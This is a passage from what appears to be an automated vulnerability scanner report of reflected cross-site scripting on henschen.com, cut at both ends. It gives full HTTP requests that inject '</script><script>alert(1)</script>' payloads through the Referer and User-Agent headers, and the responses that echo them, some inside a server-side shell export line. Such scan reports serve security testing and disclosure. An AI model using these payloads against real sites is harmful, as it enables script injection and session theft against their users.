User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:25 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616719
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6514

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-sco.gif";REFERER="http://www.google.com/search?hl=en&q=c8688</script><script>alert(1)</script>3e6a23b5830";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.13. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31dd5</script><script>alert(1)</script>299eb75b912 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1631dd5</script><script>alert(1)</script>299eb75b912
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:21 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616715
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6570

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1631dd5</script><script>alert(1)</script>299eb75b912";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/Ih8s4JY045N9O86W8rFqKGOA7R6223Gt.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.14. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript rest-of-line comment. The payload 4aac4</script><script>alert(1)</script>76cf62da887 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=4aac4</script><script>alert(1)</script>76cf62da887
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:45 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616679
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-fp.gif";REFERER="http://www.google.com/search?hl=en&q=4aac4</script><script>alert(1)</script>76cf62da887";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.15. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 40fbe(a)7b54d16e199 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: 40fbe(a)7b54d16e199
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:43 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616677
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-fp.gif";REFERER="40fbe(a)7b54d16e199";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.16. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript rest-of-line comment. The payload 2951d</script><script>alert(1)</script>9774ceac0b1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.162951d</script><script>alert(1)</script>9774ceac0b1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:42 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616676
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6581

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
rt(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.162951d</script><script>alert(1)</script>9774ceac0b1";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/3Kcn7103646Wy1JugKGWaaVr89jKNoY1.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.17. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 47de6(a)ee6d262f200 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: 47de6(a)ee6d262f200
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:43 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616677
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-mm.gif";REFERER="47de6(a)ee6d262f200";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.18. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript rest-of-line comment. The payload 1e396</script><script>alert(1)</script>9b83121c9bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=1e396</script><script>alert(1)</script>9b83121c9bc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:45 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616679
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-mm.gif";REFERER="http://www.google.com/search?hl=en&q=1e396</script><script>alert(1)</script>9b83121c9bc";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.19. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript rest-of-line comment. The payload c1cc0</script><script>alert(1)</script>b68ddd083d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16c1cc0</script><script>alert(1)</script>b68ddd083d
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:37 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616671
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6580

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
rt(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16c1cc0</script><script>alert(1)</script>b68ddd083d";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/PR8cUXlT9z6FMiV8vNl1x622c45Lih1l.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.20. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript rest-of-line comment. The payload 23310</script><script>alert(1)</script>be8c25c66b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=23310</script><script>alert(1)</script>be8c25c66b6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:38 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616672
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-oki.gif";REFERER="http://www.google.com/search?hl=en&q=23310</script><script>alert(1)</script>be8c25c66b6";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.21. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97a0f(a)59b108fb031 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: 97a0f(a)59b108fb031
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:37 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616671
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6453

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-oki.gif";REFERER="97a0f(a)59b108fb031";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.22. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript rest-of-line comment. The payload eef1e</script><script>alert(1)</script>7c98348a8de was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16eef1e</script><script>alert(1)</script>7c98348a8de
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:35 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616669
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
rt(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16eef1e</script><script>alert(1)</script>7c98348a8de";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/P8OR1fEhT9dV3O07N37U07KVXTfXo62V.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.23. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 45c41(a)c6c59df06b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: 45c41(a)c6c59df06b8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:45 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616679
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6453

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-sco.gif";REFERER="45c41(a)c6c59df06b8";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.24. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript rest-of-line comment. The payload e577b</script><script>alert(1)</script>8b6c42b829c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e577b</script><script>alert(1)</script>8b6c42b829c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
